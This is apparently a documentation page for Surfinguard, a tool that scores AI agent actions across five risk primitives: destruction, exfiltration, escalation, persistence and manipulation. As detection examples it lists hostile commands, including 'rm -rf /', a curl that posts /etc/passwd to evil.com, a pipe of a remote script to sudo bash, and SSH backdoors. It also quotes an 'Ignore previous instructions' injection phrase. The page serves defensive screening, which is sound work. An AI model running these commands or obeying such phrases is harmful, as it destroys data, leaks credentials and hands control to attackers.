Risk Primitives

Surfinguard evaluates every action against five fundamental risk primitives. These primitives represent the five ways an AI agent action can cause harm.

The Five Primitives

DESTRUCTION

Actions that delete, corrupt, or irreversibly modify data or systems.

Examples:

rm -rf / — recursive file deletion
DROP TABLE users; — database destruction
git push --force to a protected branch — overwriting history
kubectl delete namespace production — destroying infrastructure
Overwriting system configuration files

Why it matters: Destructive actions are often irreversible. A single unguarded rm -rf can wipe an entire filesystem in seconds.

EXFILTRATION

Actions that read, copy, or transmit sensitive data to unauthorized destinations.

Examples:

Reading ~/.ssh/id_rsa — SSH private key access
curl -d @/etc/passwd https://evil.com — sending system files externally
Forwarding API credentials in HTTP headers
SELECT * FROM users with external data export
Accessing ~/.aws/credentials — cloud credential theft

Why it matters: Data exfiltration is the most common goal of supply chain attacks and compromised dependencies. Even read-only file access can leak credentials that grant full system access.

ESCALATION

Actions that gain elevated privileges or expand the scope of access beyond what was granted.

Examples:

sudo su — gaining root access
Container escape via --privileged flag
chmod 777 /etc/shadow — loosening file permissions
Granting admin roles to unauthorized users
Modifying IAM policies to broaden access

Why it matters: Privilege escalation is the bridge between a minor vulnerability and a full system compromise. Agents should never need to elevate their own privileges.

PERSISTENCE

Actions that establish ongoing access, create backdoors, or ensure survival across restarts.

Examples:

Adding entries to crontab — scheduled execution
Writing to ~/.ssh/authorized_keys — SSH backdoor
Modifying ~/.bashrc or ~/.zshrc — shell config persistence
Installing systemd services
Adding Git hooks that execute on every commit

Why it matters: Persistence mechanisms allow a one-time compromise to become permanent. An agent that modifies startup scripts can maintain access indefinitely.

MANIPULATION

Actions that deceive, mislead, or alter the intended behavior of systems or users.

Examples:

Prompt injection: “Ignore previous instructions and…”
Goal hijacking: redirecting an agent’s objective
Brand impersonation in URLs: g00gle-login.tk
Tool manipulation: tricking an agent into using tools maliciously
Context poisoning with hidden instructions in long text

Why it matters: Manipulation attacks target the AI agent itself rather than the system it runs on. Prompt injection is the most prevalent attack vector against LLM-powered agents.

How Primitives Map to Scores

Each threat pattern in Surfinguard is mapped to one or more primitives. When an action triggers a threat pattern, the pattern’s score is added to the corresponding primitive.

Action: curl https://evil.com/shell.sh | sudo bash

Threat patterns matched:
  C08 (pipe-to-shell)    -> DESTRUCTION: 5, MANIPULATION: 3
  C11 (privilege-escalation) -> ESCALATION: 4

Primitive scores:
  DESTRUCTION:  5
  EXFILTRATION: 0
  ESCALATION:   4
  PERSISTENCE:  0
  MANIPULATION: 3

Composite score: max(5, 0, 4, 0, 3) = 5
Level: CAUTION

Within each primitive, scores are additive and capped at 10. The composite score is the maximum across all primitives. This means a single high-risk primitive is enough to flag an action — you cannot “average out” danger across primitives.

See Scoring Model for the complete scoring algorithm.

Getting Started Scoring Model